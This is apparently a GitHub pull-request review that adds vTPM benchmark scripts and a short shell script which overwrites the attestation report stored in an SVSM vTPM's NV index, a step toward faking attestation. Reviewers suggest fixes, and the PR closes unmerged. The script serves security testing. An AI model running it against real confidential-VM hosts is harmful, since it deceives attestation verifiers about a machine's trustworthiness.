### PR TITLE
Add a simple vTPM performance benchmark; add a simple attack script.

### PR DESCRIPTION
**Pull request by galmasi**
These are basic scripts to aid performance comparisons between SVSM vTPMs and normal socket-based vTPMs; also, scripts to perform security attacks against the SVSM vTPM.

### CODE REVIEW

File: scripts/attacks/replace_attestation_report.sh [hunk 1]
```diff
@@ -0,0 +1,23 @@
...
+
+if [[ ${filelen} != 1184 ]]
+then
+    echo "${new_attestation_report} is not a valid attestation report"
+    exit 1
+fi
+
+sudo tpm2_nvundefine -C p 0x1c00002
+sudo tpm2_nvdefine -Q 0x1c00002 -C o -s 1184 -a "ownerread|ownerwrite|policywrite|read_stclear|policyread|ppread|ownerread|authread|no_da"
+sudo tpm2_nvwrite -Q 0x1c00002 -C o -i ~galmasi/guest_report.bin
```
Comment (ruocco) [inline scripts/attacks/replace_attestation_report.sh:23]: ~galmasi/guest_report.bin > ${new_attestation_report}

**Review by ruocco — COMMENTED** [review]
No particular noise apart from the obvious hard-coded path.

I would also avoid `sudo` in a script and just check that it was launched by root (maybe system does not have sudo)

Also also, if no guest_report is provided I would try to get one locally (used to fake vmpl1 and vmpl0 svsm-less reports).

Something like:

```
diff --git a/scripts/attacks/replace_attestation_report.sh b/scripts/attacks/replace_attestation_report.sh
index 6be187c..3f3e924 100755
--- a/scripts/attacks/replace_attestation_report.sh
+++ b/scripts/attacks/replace_attestation_report.sh
@@ -3,13 +3,26 @@
 # This simple function overwrites the attestation report in an SVSM vTPM.
 # This is a pre-requisite of any attack that involves faking an attestation report.

-if [[ $# != 1 ]]
+
+local_report=/tmp/guest_report.bin
+
+if [ "$EUID" -ne 0 ]
+    then echo "Please run as root"
+    exit 1
+fi
+
+if [[ $# -eq 1 ]]
+then
+    new_attestation_report=$1
+elif sev-guest-get-report ${local_report} > /dev/null 2>&1
 then
-    echo "Usage: $0 <attestation_report_file>"
+    new_attestation_report=${local_report}
+else
+    echo "No attestation report provided, nor was able to generate one"
+    echo "Usage: $0 [attestation_report_file]"
     exit 1
 fi

-new_attestation_report=$1
 filelen=$(wc -c ${new_attestation_report} | awk '{ print $1 }')

 if [[ ${filelen} != 1184 ]]
@@ -18,6 +31,6 @@ then
     exit 1
 fi

-sudo tpm2_nvundefine -C p 0x1c00002
-sudo tpm2_nvdefine -Q 0x1c00002 -C o -s 1184 -a "ownerread|ownerwrite|policywrite|read_stclear|policyread|ppread|ownerread|authread|no_da"
-sudo tpm2_nvwrite -Q 0x1c00002 -C o -i ~galmasi/guest_report.bin
+tpm2_nvundefine -C p 0x1c00002
+tpm2_nvdefine -Q 0x1c00002 -C o -s 1184 -a "ownerread|ownerwrite|policywrite|read_stclear|policyread|ppread|ownerread|authread|no_da"
+tpm2_nvwrite -Q 0x1c00002 -C o -i ${new_attestation_report}
```

File: scripts/attacks/replace_attestation_report.sh (hunk 1 above)
Comment (arkivm) [reply scripts/attacks/replace_attestation_report.sh:23]: Change it to `${HOME}`
```suggestion
sudo tpm2_nvwrite -Q 0x1c00002 -C o -i ${HOME}/guest_report.bin
```

**Comment by cclaudio** [comment]
I added some small fixes (including the ones suggested here) and pushed the patches. Thanks @galmasi @arkivm @ruocco

**Pull request closed without merging**